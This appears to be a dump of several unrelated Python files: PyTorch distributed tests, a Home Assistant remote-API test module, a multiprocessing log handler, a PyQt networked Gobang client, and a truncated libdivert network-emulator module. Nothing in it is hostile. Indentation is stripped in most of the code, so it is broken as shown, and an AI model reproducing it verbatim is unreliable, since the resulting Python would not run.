if not c10d.distributed_c10d._rank_not_in_group(process_group)
else -1
)
# Verify sequence numbers are appropriately incremented
for i in range(10):
t = torch.ones(1, device=torch.cuda.current_device())
dist.all_reduce(t, group=process_group)
if not c10d.distributed_c10d._rank_not_in_group(process_group):
seq_num = self._verify_sequence_number_across_pg(
pg=process_group,
verify_pg=verify_pg,
)
self.assertEqual(initial_num + i + 1, seq_num)
if dist.get_world_size(process_group) > 2:
# Test when certain ranks don't call collectives
if dist.get_rank(process_group) not in [0, 2]:
dist.all_reduce(t, group=process_group, async_op=True)
# Now ranks 0 and 2 should be lagging by 1.
if not c10d.distributed_c10d._rank_not_in_group(process_group):
seq_num = process_group._get_sequence_number_for_group()
rank = dist.get_rank(process_group)
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
dist.all_gather_object(obj_list, (rank, seq_num), group=verify_pg)
rank_to_seq_num = {rank: num for (rank, num) in obj_list}
self.assertEqual(len(set(rank_to_seq_num.values())), 2)
self.assertEqual(rank_to_seq_num[0], rank_to_seq_num[2])
expected_same = {
rank_to_seq_num[i]
for i in rank_to_seq_num.keys()
if i not in [0, 2]
}
self.assertEqual(len(expected_same), 1)
self.assertEqual(rank_to_seq_num[0] + 1, rank_to_seq_num[1])
def _test_sequence_num_incremented_default_group(self, backend_name):
torch.cuda.set_device(self.rank)
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
self._test_sequence_num_incremented(
c10d.distributed_c10d._get_default_group(),
ranks=list(i for i in range(dist.get_world_size())),
)
def _test_sequence_num_incremented_subgroup(self, backend_name):
torch.cuda.set_device(self.rank)
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup_ranks = [0, 1, 2]
subgroup = dist.new_group(subgroup_ranks)
self._test_sequence_num_incremented(subgroup, subgroup_ranks)
def _test_sequence_num_set_default_pg(self, backend):
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
default_pg = c10d.distributed_c10d._get_default_group()
seq_num = default_pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size())]
dist.all_gather_object(obj_list, seq_num)
self.assertEqual(len(set(obj_list)), 1)
def _test_sequence_num_set_new_group(self, backend):
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup = dist.new_group([0, 1])
if not c10d.distributed_c10d._rank_not_in_group(subgroup):
subgroup_seq = subgroup._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(subgroup))]
dist.all_gather_object(obj_list, subgroup_seq, group=subgroup)
self.assertEqual(len(set(obj_list)), 1)
# TSAN is not fork-safe since we're forking in a multi-threaded environment
if not TEST_WITH_TSAN:
class CommTest(AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
if sys.platform == "win32":
self._spawn_processes()
else:
self._fork_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_distributed_debug_mode(self):
# Default should be off
default_debug_mode = dist._get_debug_mode()
self.assertEqual(default_debug_mode, dist._DistributedDebugLevel.OFF)
mapping = {
"OFF": dist._DistributedDebugLevel.OFF,
"INFO": dist._DistributedDebugLevel.INFO,
"DETAIL": dist._DistributedDebugLevel.DETAIL,
}
invalid_debug_modes = ["foo", 0, 1, -1]
for mode in mapping.keys():
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
set_debug_mode = dist._get_debug_mode()
self.assertEqual(
set_debug_mode,
mapping[mode],
f"Expected {mode} to map to {mapping[mode]} but got {set_debug_mode}",
)
for mode in invalid_debug_modes:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
with self.assertRaisesRegex(RuntimeError, "to be one of"):
dist._get_debug_mode()
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
test_remote.py
|
"""Test Home Assistant remote methods and classes."""
# pylint: disable=protected-access
import asyncio
import threading
import unittest
from unittest.mock import patch
import homeassistant.core as ha
import homeassistant.bootstrap as bootstrap
import homeassistant.remote as remote
import homeassistant.components.http as http
from homeassistant.const import HTTP_HEADER_HA_AUTH, EVENT_STATE_CHANGED
import homeassistant.util.dt as dt_util
from tests.common import (
get_test_instance_port, get_test_home_assistant, get_test_config_dir)
API_PASSWORD = 'test1234'
MASTER_PORT = get_test_instance_port()
SLAVE_PORT = get_test_instance_port()
BROKEN_PORT = get_test_instance_port()
HTTP_BASE_URL = 'http://127.0.0.1:{}'.format(MASTER_PORT)
HA_HEADERS = {HTTP_HEADER_HA_AUTH: API_PASSWORD}
broken_api = remote.API('127.0.0.1', "bladybla", port=get_test_instance_port())
hass, slave, master_api = None, None, None
def _url(path=''):
"""Helper method to generate URLs."""
return HTTP_BASE_URL + path
# pylint: disable=invalid-name
def setUpModule():
    """Initialization of a Home Assistant server and Slave instance."""
global hass, slave, master_api
hass = get_test_home_assistant()
hass.bus.listen('test_event', lambda _: _)
hass.states.set('test.test', 'a_state')
bootstrap.setup_component(
hass, http.DOMAIN,
{http.DOMAIN: {http.CONF_API_PASSWORD: API_PASSWORD,
http.CONF_SERVER_PORT: MASTER_PORT}})
bootstrap.setup_component(hass, 'api')
hass.start()
master_api = remote.API('127.0.0.1', API_PASSWORD, MASTER_PORT)
# Start slave
loop = asyncio.new_event_loop()
# FIXME: should not be a daemon
threading.Thread(name='SlaveThread', daemon=True,
target=loop.run_forever).start()
slave = remote.HomeAssistant(master_api, loop=loop)
slave.async_track_tasks()
slave.config.config_dir = get_test_config_dir()
slave.config.skip_pip = True
bootstrap.setup_component(
slave, http.DOMAIN,
{http.DOMAIN: {http.CONF_API_PASSWORD: API_PASSWORD,
http.CONF_SERVER_PORT: SLAVE_PORT}})
with patch.object(ha, '_async_create_timer', return_value=None):
slave.start()
# pylint: disable=invalid-name
def tearDownModule():
"""Stop the Home Assistant server and slave."""
slave.stop()
hass.stop()
class TestRemoteMethods(unittest.TestCase):
"""Test the homeassistant.remote module."""
def tearDown(self):
"""Stop everything that was started."""
slave.block_till_done()
hass.block_till_done()
def test_validate_api(self):
"""Test Python API validate_api."""
self.assertEqual(remote.APIStatus.OK, remote.validate_api(master_api))
self.assertEqual(
remote.APIStatus.INVALID_PASSWORD,
remote.validate_api(
remote.API('127.0.0.1', API_PASSWORD + 'A', MASTER_PORT)))
self.assertEqual(
remote.APIStatus.CANNOT_CONNECT, remote.validate_api(broken_api))
def test_get_event_listeners(self):
"""Test Python API get_event_listeners."""
local_data = hass.bus.listeners
remote_data = remote.get_event_listeners(master_api)
for event in remote_data:
self.assertEqual(local_data.pop(event["event"]),
event["listener_count"])
self.assertEqual(len(local_data), 0)
self.assertEqual({}, remote.get_event_listeners(broken_api))
def test_fire_event(self):
"""Test Python API fire_event."""
test_value = []
@ha.callback
def listener(event):
"""Helper method that will verify our event got called."""
test_value.append(1)
hass.bus.listen("test.event_no_data", listener)
remote.fire_event(master_api, "test.event_no_data")
hass.block_till_done()
self.assertEqual(1, len(test_value))
# Should not trigger any exception
remote.fire_event(broken_api, "test.event_no_data")
def test_get_state(self):
"""Test Python API get_state."""
self.assertEqual(
hass.states.get('test.test'),
remote.get_state(master_api, 'test.test'))
self.assertEqual(None, remote.get_state(broken_api, 'test.test'))
    def test_get_states(self):
        """Test Python API get_states."""
self.assertEqual(hass.states.all(), remote.get_states(master_api))
self.assertEqual([], remote.get_states(broken_api))
    def test_remove_state(self):
        """Test Python API remove_state."""
hass.states.set('test.remove_state', 'set_test')
self.assertIn('test.remove_state', hass.states.entity_ids())
remote.remove_state(master_api, 'test.remove_state')
self.assertNotIn('test.remove_state', hass.states.entity_ids())
def test_set_state(self):
"""Test Python API set_state."""
remote.set_state(master_api, 'test.test', 'set_test')
state = hass.states.get('test.test')
self.assertIsNotNone(state)
self.assertEqual('set_test', state.state)
self.assertFalse(remote.set_state(broken_api, 'test.test', 'set_test'))
def test_set_state_with_push(self):
"""Test Python API set_state with push option."""
events = []
hass.bus.listen(EVENT_STATE_CHANGED, lambda ev: events.append(ev))
remote.set_state(master_api, 'test.test', 'set_test_2')
remote.set_state(master_api, 'test.test', 'set_test_2')
hass.block_till_done()
self.assertEqual(1, len(events))
remote.set_state(
master_api, 'test.test', 'set_test_2', force_update=True)
hass.block_till_done()
self.assertEqual(2, len(events))
def test_is_state(self):
"""Test Python API is_state."""
self.assertTrue(
remote.is_state(master_api, 'test.test',
hass.states.get('test.test').state))
self.assertFalse(
remote.is_state(broken_api, 'test.test',
hass.states.get('test.test').state))
def test_get_services(self):
"""Test Python API get_services."""
local_services = hass.services.services
for serv_domain in remote.get_services(master_api):
local = local_services.pop(serv_domain["domain"])
self.assertEqual(local, serv_domain["services"])
self.assertEqual({}, remote.get_services(broken_api))
def test_call_service(self):
"""Test Python API services.call."""
test_value = []
@ha.callback
def listener(service_call):
"""Helper method that will verify that our service got called."""
test_value.append(1)
hass.services.register("test_domain", "test_service", listener)
remote.call_service(master_api, "test_domain", "test_service")
hass.block_till_done()
self.assertEqual(1, len(test_value))
# Should not raise an exception
remote.call_service(broken_api, "test_domain", "test_service")
def test_json_encoder(self):
"""Test the JSON Encoder."""
ha_json_enc = remote.JSONEncoder()
state = hass.states.get('test.test')
self.assertEqual(state.as_dict(), ha_json_enc.default(state))
# Default method raises TypeError if non HA object
self.assertRaises(TypeError, ha_json_enc.default, 1)
now = dt_util.utcnow()
self.assertEqual(now.isoformat(), ha_json_enc.default(now))
class TestRemoteClasses(unittest.TestCase):
"""Test the homeassistant.remote module."""
def tearDown(self):
"""Stop everything that was started."""
slave.block_till_done()
hass.block_till_done()
def test_home_assistant_init(self):
"""Test HomeAssistant init."""
# Wrong password
self.assertRaises(
ha.HomeAssistantError, remote.HomeAssistant,
remote.API('127.0.0.1', API_PASSWORD + 'A', 8124))
# Wrong port
self.assertRaises(
ha.HomeAssistantError, remote.HomeAssistant,
remote.API('127.0.0.1', API_PASSWORD, BROKEN_PORT))
def test_statemachine_init(self):
"""Test if remote.StateMachine copies all states on init."""
self.assertEqual(sorted(hass.states.all()),
sorted(slave.states.all()))
def test_statemachine_set(self):
"""Test if setting the state on a slave is recorded."""
slave.states.set("remote.test", "remote.statemachine test")
# Wait till slave tells master
slave.block_till_done()
# Wait till master gives updated state
hass.block_till_done()
self.assertEqual("remote.statemachine test",
slave.states.get("remote.test").state)
def test_statemachine_remove_from_master(self):
"""Remove statemachine from master."""
hass.states.set("remote.master_remove", "remove me!")
hass.block_till_done()
slave.block_till_done()
self.assertIn('remote.master_remove', slave.states.entity_ids())
hass.states.remove("remote.master_remove")
hass.block_till_done()
slave.block_till_done()
self.assertNotIn('remote.master_remove', slave.states.entity_ids())
def test_statemachine_remove_from_slave(self):
"""Remove statemachine from slave."""
hass.states.set("remote.slave_remove", "remove me!")
hass.block_till_done()
self.assertIn('remote.slave_remove', slave.states.entity_ids())
self.assertTrue(slave.states.remove("remote.slave_remove"))
slave.block_till_done()
hass.block_till_done()
self.assertNotIn('remote.slave_remove', slave.states.entity_ids())
def test_eventbus_fire(self):
"""Test if events fired from the eventbus get fired."""
hass_call = []
slave_call = []
hass.bus.listen("test.event_no_data", lambda _: hass_call.append(1))
slave.bus.listen("test.event_no_data", lambda _: slave_call.append(1))
slave.bus.fire("test.event_no_data")
# Wait till slave tells master
slave.block_till_done()
# Wait till master gives updated event
hass.block_till_done()
self.assertEqual(1, len(hass_call))
self.assertEqual(1, len(slave_call))
def test_get_config(self):
"""Test the return of the configuration."""
self.assertEqual(hass.config.as_dict(), remote.get_config(master_api))
|
multi_logging.py
|
from logging.handlers import RotatingFileHandler
import multiprocessing, threading, logging, sys, traceback
class MultiProcessingLog(logging.Handler):
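    # Records emitted from any process are pushed onto a multiprocessing.Queue;
    # a daemon thread in the process that created the handler drains the queue and
    # writes through a single RotatingFileHandler, so the processes never write to
    # the log file concurrently.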
def __init__(self, name, mode, maxsize, rotate):
logging.Handler.__init__(self)
self._handler = RotatingFileHandler(name, mode, maxsize, rotate)
self.queue = multiprocessing.Queue(-1)
t = threading.Thread(target=self.receive)
t.daemon = True
t.start()
def setFormatter(self, fmt):
logging.Handler.setFormatter(self, fmt)
self._handler.setFormatter(fmt)
def receive(self):
while True:
try:
record = self.queue.get()
self._handler.emit(record)
except (KeyboardInterrupt, SystemExit):
raise
except EOFError:
break
except:
traceback.print_exc(file=sys.stderr)
def send(self, s):
self.queue.put_nowait(s)
def _format_record(self, record):
# ensure that exc_info and args
# have been stringified. Removes any chance of
# unpickleable things inside and possibly reduces
# message size sent over the pipe
if record.args:
record.msg = record.msg % record.args
record.args = None
if record.exc_info:
dummy = self.format(record)
record.exc_info = None
return record
def emit(self, record):
try:
s = self._format_record(record)
self.send(s)
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def close(self):
self._handler.close()
logging.Handler.close(self)
|
client.py
|
'''
Function:
    Online multiplayer game client
Author:
Charles
WeChat Official Account:
Charles的皮卡丘
'''
import socket
import pygame
import random
import threading
from ..misc import *
from PyQt5 import QtCore
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from itertools import product
'''Client'''
class GobangClient(QWidget):
back_signal = pyqtSignal()
exit_signal = pyqtSignal()
receive_signal = pyqtSignal(dict, name='data')
send_back_signal = False
def __init__(self, cfg, nickname, server_ip, parent=None, **kwargs):
super(GobangClient, self).__init__(parent)
        # Pre-define some necessary variables
self.cfg = cfg
self.nickname = nickname
self.opponent_nickname = None
self.server_ipport = (server_ip, cfg.PORT)
self.is_gaming = False
self.chessboard = [[None for i in range(19)] for _ in range(19)]
self.history_record = []
self.winner = None
self.winner_info_label = None
self.player_color = 'black'
self.opponent_player_color = 'white'
self.whoseround = None
        # Basic settings for the current window
self.setFixedSize(760, 650)
self.setWindowTitle('五子棋 —— Charles的皮卡丘')
self.setWindowIcon(QIcon(cfg.ICON_FILEPATH))
        # Background image
palette = QPalette()
palette.setBrush(self.backgroundRole(), QBrush(QPixmap(cfg.BACKGROUND_IMAGEPATHS.get('bg_game'))))
self.setPalette(palette)
        # Show your nickname
self.nickname_label = QLabel('您是%s' % self.nickname, self)
self.nickname_label.resize(200, 40)
self.nickname_label.move(640, 180)
        # Marker for the most recent move
self.chessman_sign = QLabel(self)
sign = QPixmap(cfg.CHESSMAN_IMAGEPATHS.get('sign'))
self.chessman_sign.setPixmap(sign)
self.chessman_sign.setFixedSize(sign.size())
self.chessman_sign.show()
self.chessman_sign.hide()
        # Buttons
self.home_button = PushButton(cfg.BUTTON_IMAGEPATHS.get('home'), self)
self.home_button.click_signal.connect(self.goHome)
self.home_button.move(680, 10)
self.startgame_button = PushButton(cfg.BUTTON_IMAGEPATHS.get('startgame'), self)
self.startgame_button.click_signal.connect(self.startgame)
self.startgame_button.move(640, 240)
self.regret_button = PushButton(cfg.BUTTON_IMAGEPATHS.get('regret'), self)
self.regret_button.click_signal.connect(self.regret)
self.regret_button.move(640, 310)
self.givein_button = PushButton(cfg.BUTTON_IMAGEPATHS.get('givein'), self)
self.givein_button.click_signal.connect(self.givein)
self.givein_button.move(640, 380)
self.urge_button = PushButton(cfg.BUTTON_IMAGEPATHS.get('urge'), self)
self.urge_button.click_signal.connect(self.urge)
self.urge_button.move(640, 450)
        # Load the piece-drop and urge sound effects
pygame.mixer.init()
self.drop_sound = pygame.mixer.Sound(cfg.SOUNDS_PATHS.get('drop'))
self.urge_sound = pygame.mixer.Sound(cfg.SOUNDS_PATHS.get('urge'))
        # Bind the receive-data signal to the responseForReceiveData function
self.receive_signal.connect(self.responseForReceiveData)
        # TCP/IP client
self.tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.tcp_socket.connect(self.server_ipport)
data = {'type': 'nickname', 'data': self.nickname}
self.tcp_socket.sendall(packSocketData(data))
self.setWindowTitle('五子棋-微信公众号: Charles的皮卡丘 ——> 已经成功连接服务器, 点击开始按钮进行游戏')
        # Start a thread to listen for server data
threading.Thread(target=self.receiveServerData).start()
    '''Return to the main game screen'''
def goHome(self):
self.send_back_signal = True
self.close()
self.back_signal.emit()
    '''Start the game'''
def startgame(self):
self.randomAssignColor()
data = {'type': 'action', 'detail': 'startgame', 'data': [self.player_color, self.opponent_player_color]}
self.tcp_socket.sendall(packSocketData(data))
QMessageBox.information(self, '提示', '游戏开始请求已发送, 等待对方确定中')
    '''Concede the game'''
def givein(self):
if self.is_gaming and (self.winner is None) and (self.whoseround == self.player_color):
self.winner = self.opponent_player_color
self.showGameEndInfo()
data = {'type': 'action', 'detail': 'givein'}
self.tcp_socket.sendall(packSocketData(data))
    '''Undo a move - only allowed during the opponent's turn'''
def regret(self):
if self.is_gaming and (self.winner is None) and (self.whoseround == self.opponent_player_color):
data = {'type': 'action', 'detail': 'regret'}
self.tcp_socket.sendall(packSocketData(data))
    '''Urge the opponent to move'''
def urge(self):
if self.is_gaming and (self.winner is None) and (self.whoseround == self.opponent_player_color):
data = {'type': 'action', 'detail': 'urge'}
self.tcp_socket.sendall(packSocketData(data))
self.urge_sound.play()
    '''Left mouse button click event - the player's turn'''
def mousePressEvent(self, event):
if (event.buttons() != QtCore.Qt.LeftButton) or (self.winner is not None) or (self.whoseround != self.player_color) or (not self.is_gaming):
return
        # Only respond to clicks inside the board area
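        # The board is assumed to start at pixel (50, 50) with 30px between the 19
        # grid lines (18 gaps); the extra 14px of slack presumably accounts for the
        # size of the piece sprite.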
if event.x() >= 50 and event.x() <= 50 + 30 * 18 + 14 and event.y() >= 50 and event.y() <= 50 + 30 * 18 + 14:
pos = Pixel2Chesspos(event)
            # Make sure no piece has already been placed at this position
if self.chessboard[pos[0]][pos[1]]:
return
            # Instantiate a chess piece and display it
c = Chessman(self.cfg.CHESSMAN_IMAGEPATHS.get(self.whoseround), self)
c.move(event.pos())
c.show()
self.chessboard[pos[0]][pos[1]] = c
            # Play the piece-drop sound
self.drop_sound.play()
            # Move the last-move marker so it follows the new piece
self.chessman_sign.show()
self.chessman_sign.move(c.pos())
self.chessman_sign.raise_()
            # Record this move
self.history_record.append([*pos, self.whoseround])
            # Send our move position to the opponent
data = {'type': 'action', 'detail': 'drop', 'data': pos}
self.tcp_socket.sendall(packSocketData(data))
            # Check whether this move wins the game
self.winner = checkWin(self.chessboard)
if self.winner:
self.showGameEndInfo()
return
            # Switch turns (i.e. change the active color)
self.nextRound()
    '''Show the game-over result'''
def showGameEndInfo(self):
self.is_gaming = False
info_img = QPixmap(self.cfg.WIN_IMAGEPATHS.get(self.winner))
self.winner_info_label = QLabel(self)
self.winner_info_label.setPixmap(info_img)
self.winner_info_label.resize(info_img.size())
self.winner_info_label.move(50, 50)
self.winner_info_label.show()
    '''Handle the received data'''
def responseForReceiveData(self, data):
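        # Dispatch on (type, detail): 'action' messages are forwarded from the opponent
        # (exit / startgame / drop / givein / urge / regret), 'reply' messages answer our
        # own earlier requests, and 'nickname' carries the opponent's nickname.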
if data['type'] == 'action' and data['detail'] == 'exit':
QMessageBox.information(self, '提示', '您的对手已退出游戏, 游戏将自动返回主界面')
self.goHome()
elif data['type'] == 'action' and data['detail'] == 'startgame':
self.opponent_player_color, self.player_color = data['data']
self.whoseround = 'white'
self.whoseround2nickname_dict = {self.player_color: self.nickname, self.opponent_player_color: self.opponent_nickname}
res = QMessageBox.information(self, '提示', '对方请求(重新)开始游戏, 您为%s, 您是否同意?' % {'white': '白子', 'black': '黑子'}.get(self.player_color), QMessageBox.Yes | QMessageBox.No)
if res == QMessageBox.Yes:
data = {'type': 'reply', 'detail': 'startgame', 'data': True}
self.tcp_socket.sendall(packSocketData(data))
self.is_gaming = True
self.setWindowTitle('五子棋-微信公众号: Charles的皮卡丘 ——> %s走棋' % self.whoseround2nickname_dict.get(self.whoseround))
for i, j in product(range(19), range(19)):
if self.chessboard[i][j]:
self.chessboard[i][j].close()
self.chessboard[i][j] = None
self.history_record.clear()
self.winner = None
if self.winner_info_label:
self.winner_info_label.close()
self.winner_info_label = None
self.chessman_sign.hide()
else:
data = {'type': 'reply', 'detail': 'startgame', 'data': False}
self.tcp_socket.sendall(packSocketData(data))
elif data['type'] == 'action' and data['detail'] == 'drop':
pos = data['data']
            # Instantiate a chess piece and display it
c = Chessman(self.cfg.CHESSMAN_IMAGEPATHS.get(self.whoseround), self)
c.move(QPoint(*Chesspos2Pixel(pos)))
c.show()
self.chessboard[pos[0]][pos[1]] = c
            # Play the piece-drop sound
self.drop_sound.play()
            # Move the last-move marker so it follows the new piece
self.chessman_sign.show()
self.chessman_sign.move(c.pos())
self.chessman_sign.raise_()
            # Record this move
self.history_record.append([*pos, self.whoseround])
            # Check whether this move wins the game
self.winner = checkWin(self.chessboard)
if self.winner:
self.showGameEndInfo()
return
            # Switch turns (i.e. change the active color)
self.nextRound()
elif data['type'] == 'action' and data['detail'] == 'givein':
self.winner = self.player_color
self.showGameEndInfo()
elif data['type'] == 'action' and data['detail'] == 'urge':
self.urge_sound.play()
elif data['type'] == 'action' and data['detail'] == 'regret':
res = QMessageBox.information(self, '提示', '对方请求悔棋, 您是否同意?', QMessageBox.Yes | QMessageBox.No)
if res == QMessageBox.Yes:
pre_round = self.history_record.pop(-1)
self.chessboard[pre_round[0]][pre_round[1]].close()
self.chessboard[pre_round[0]][pre_round[1]] = None
self.chessman_sign.hide()
self.nextRound()
data = {'type': 'reply', 'detail': 'regret', 'data': True}
self.tcp_socket.sendall(packSocketData(data))
else:
data = {'type': 'reply', 'detail': 'regret', 'data': False}
self.tcp_socket.sendall(packSocketData(data))
elif data['type'] == 'reply' and data['detail'] == 'startgame':
if data['data']:
self.is_gaming = True
self.setWindowTitle('五子棋-微信公众号: Charles的皮卡丘 ——> %s走棋' % self.whoseround2nickname_dict.get(self.whoseround))
for i, j in product(range(19), range(19)):
if self.chessboard[i][j]:
self.chessboard[i][j].close()
self.chessboard[i][j] = None
self.history_record.clear()
self.winner = None
if self.winner_info_label:
self.winner_info_label.close()
self.winner_info_label = None
self.chessman_sign.hide()
QMessageBox.information(self, '提示', '对方同意开始游戏请求, 您为%s, 执白者先行.' % {'white': '白子', 'black': '黑子'}.get(self.player_color))
else:
QMessageBox.information(self, '提示', '对方拒绝了您开始游戏的请求.')
elif data['type'] == 'reply' and data['detail'] == 'regret':
if data['data']:
pre_round = self.history_record.pop(-1)
self.chessboard[pre_round[0]][pre_round[1]].close()
self.chessboard[pre_round[0]][pre_round[1]] = None
self.nextRound()
QMessageBox.information(self, '提示', '对方同意了您的悔棋请求.')
else:
QMessageBox.information(self, '提示', '对方拒绝了您的悔棋请求.')
elif data['type'] == 'nickname':
self.opponent_nickname = data['data']
    '''Randomly assign colors to both players - white moves first'''
def randomAssignColor(self):
self.player_color = random.choice(['white', 'black'])
self.opponent_player_color = 'white' if self.player_color == 'black' else 'black'
self.whoseround = 'white'
self.whoseround2nickname_dict = {self.player_color: self.nickname, self.opponent_player_color: self.opponent_nickname}
    '''Switch whose turn it is'''
def nextRound(self):
self.whoseround = self.player_color if self.whoseround == self.opponent_player_color else self.opponent_player_color
self.setWindowTitle('五子棋-微信公众号: Charles的皮卡丘 ——> %s走棋' % self.whoseround2nickname_dict.get(self.whoseround))
    '''Receive data from the server'''
def receiveServerData(self):
while True:
data = receiveAndReadSocketData(self.tcp_socket)
self.receive_signal.emit(data)
    '''Window close event'''
def closeEvent(self, event):
self.tcp_socket.sendall(packSocketData({'type': 'action', 'detail': 'exit'}))
self.tcp_socket.shutdown(socket.SHUT_RDWR)
self.tcp_socket.close()
return super().closeEvent(event)
|
emulator.py
|
# encoding: utf8
import os
import sys
import json
import copy
import psutil
import threading
import netifaces
import socket
import time
import signal
import Tkinter as tk
from macdivert import MacDivert
from tkMessageBox import showerror, showwarning
from enum import Defaults
from tkFileDialog import askopenfilename, askdirectory
from ctypes import POINTER, pointer, cast
from ctypes import (c_uint8, c_void_p, c_int32, c_char_p, c_int, c_float,
create_string_buffer, c_size_t, c_ssize_t, c_uint64)
# import pydevd
# pydevd.settrace('localhost', port=9999, stdoutToServer=True, stderrToServer=True)
__author__ = 'huangyan13@baidu.com'
class Flags(object):
# direction flags
DIRECTION_IN = 0
DIRECTION_OUT = 1
DIRECTION_UNKNOWN = 2
# feature flags
EMULATOR_IS_RUNNING = 1
EMULATOR_DUMP_PCAP = (1 << 1)
EMULATOR_RECHECKSUM = (1 << 2)
# pipe flags
PIPE_DROP = 0
PIPE_DELAY = 1
PIPE_THROTTLE = 2
PIPE_DISORDER = 3
PIPE_BITERR = 4
PIPE_DUPLICATE = 5
PIPE_BANDWIDTH = 6
PIPE_REINJECT = 7
# buffer size
EMULALTOR_BUF_SIZE = 8172
DELAY_QUEUE_SIZE = 8172
class BasicPipe(object):
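    # Base class for all traffic-shaping pipes: each subclass wraps one of the
    # *_pipe_create functions exported by libdivert and stores the returned
    # opaque handle in self.handle.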
def __init__(self):
self.handle = None
if Emulator.libdivert_ref is None:
raise RuntimeError("Should first instantiate an Emulator object")
else:
self._lib = Emulator.libdivert_ref
class DelayPipe(BasicPipe):
def __init__(self, delay_time, t=None,
queue_size=Flags.DELAY_QUEUE_SIZE,
ip_filter_obj=None, size_filter_obj=None):
super(DelayPipe, self).__init__()
# first set function signature
setattr(getattr(self._lib, 'delay_pipe_create'), "argtypes",
[c_void_p, c_void_p, c_size_t, POINTER(c_float), POINTER(c_float), c_size_t])
setattr(getattr(self._lib, 'delay_pipe_create'), "restype", c_void_p)
arr_len = len(delay_time)
arr_type = c_float * arr_len
# then check packet size filter handle
ip_filter_handle = None if ip_filter_obj is None else ip_filter_obj.handle
size_filter_handle = None if size_filter_obj is None else size_filter_obj.handle
self.handle = self._lib.delay_pipe_create(ip_filter_handle, size_filter_handle, arr_len,
arr_type(*list(t)) if t else None,
arr_type(*list(delay_time)),
queue_size)
class DropPipe(BasicPipe):
def __init__(self, drop_rate, t=None,
ip_filter_obj=None, size_filter_obj=None):
super(DropPipe, self).__init__()
# first set function signature
setattr(getattr(self._lib, 'drop_pipe_create'), "argtypes",
[c_void_p, c_void_p, c_size_t, POINTER(c_float), POINTER(c_float)])
setattr(getattr(self._lib, 'drop_pipe_create'), "restype", c_void_p)
arr_len = len(drop_rate)
arr_type = c_float * arr_len
# then check packet size filter handle
ip_filter_handle = None if ip_filter_obj is None else ip_filter_obj.handle
size_filter_handle = None if size_filter_obj is None else size_filter_obj.handle
self.handle = self._lib.drop_pipe_create(ip_filter_handle, size_filter_handle, arr_len,
arr_type(*list(t)) if t else None,
arr_type(*list(drop_rate)))
class BandwidthPipe(BasicPipe):
def __init__(self, t, bandwidth, queue_size=Flags.DELAY_QUEUE_SIZE,
ip_filter_obj=None, size_filter_obj=None):
super(BandwidthPipe, self).__init__()
# first set function signature
setattr(getattr(self._lib, 'bandwidth_pipe_create'), "argtypes",
[c_void_p, c_void_p, c_size_t, POINTER(c_float), POINTER(c_float), c_size_t])
setattr(getattr(self._lib, 'bandwidth_pipe_create'), "restype", c_void_p)
arr_len = len(t)
arr_type = c_float * arr_len
# then check packet size filter handle
ip_filter_handle = None if ip_filter_obj is None else ip_filter_obj.handle
size_filter_handle = None if size_filter_obj is None else size_filter_obj.handle
self.handle = self._lib.bandwidth_pipe_create(ip_filter_handle, size_filter_handle,
arr_len, arr_type(*list(t)),
arr_type(*list(bandwidth)),
queue_size)
class BiterrPipe(BasicPipe):
def __init__(self, t, biterr_rate, max_flip, ip_filter_obj=None, size_filter_obj=None):
super(BiterrPipe, self).__init__()
# first set function signature
setattr(getattr(self._lib, 'biterr_pipe_create'), "argtypes",
[c_void_p, c_void_p, c_size_t, POINTER(c_float), POINTER(c_float), c_int])
setattr(getattr(self._lib, 'biterr_pipe_create'), "restype", c_void_p)
arr_len = len(t)
arr_type = c_float * arr_len
# then check packet size filter handle
ip_filter_handle = None if ip_filter_obj is None else ip_filter_obj.handle
size_filter_handle = None if size_filter_obj is None else size_filter_obj.handle
self.handle = self._lib.biterr_pipe_create(ip_filter_handle, size_filter_handle,
arr_len, arr_type(*list(t)),
arr_type(*list(biterr_rate)), max_flip)
class DisorderPipe(BasicPipe):
def __init__(self, t, disorder_rate, queue_size, max_disorder,
ip_filter_obj=None, size_filter_obj=None):
super(DisorderPipe, self).__init__()
# first set function signature
setattr(getattr(self._lib, 'disorder_pipe_create'), "argtypes",
[c_void_p, c_void_p, c_size_t, POINTER(c_float), POINTER(c_float), c_size_t, c_int])
setattr(getattr(self._lib, 'disorder_pipe_create'), "restype", c_void_p)
arr_len = len(t)
arr_type = c_float * arr_len
# then check packet size filter handle
ip_filter_handle = None if ip_filter_obj is None else ip_filter_obj.handle
size_filter_handle = None if size_filter_obj is None else size_filter_obj.handle
self.handle = self._lib.disorder_pipe_create(ip_filter_handle, size_filter_handle,
arr_len, arr_type(*list(t)),
arr_type(*list(disorder_rate)),
queue_size, max_disorder)
class DuplicatePipe(BasicPipe):
def __init__(self, t, duplicate_rate, max_duplicate,
ip_filter_obj=None, size_filter_obj=None):
super(DuplicatePipe, self).__init__()
# first set function signature
setattr(getattr(self._lib, 'duplicate_pipe_create'), "argtypes",
[c_void_p, c_void_p, c_size_t, POINTER(c_float), POINTER(c_float), c_size_t])
setattr(getattr(self._lib, 'duplicate_pipe_create'), "restype", c_void_p)
arr_len = len(t)
arr_type = c_float * arr_len
# then check packet size filter handle
ip_filter_handle = None if ip_filter_obj is None else ip_filter_obj.handle
size_filter_handle = None if size_filter_obj is None else size_filter_obj.handle
self.handle = self._lib.duplicate_pipe_create(ip_filter_handle, size_filter_handle, arr_len,
arr_type(*list(t)),
